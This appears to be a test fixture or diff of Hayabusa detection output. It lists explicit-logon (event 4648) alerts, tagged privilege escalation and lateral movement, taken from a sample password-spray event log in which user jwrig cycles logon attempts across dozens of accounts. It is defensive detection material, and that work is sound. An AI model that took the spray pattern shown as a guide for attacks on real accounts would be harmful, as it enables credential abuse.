+2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
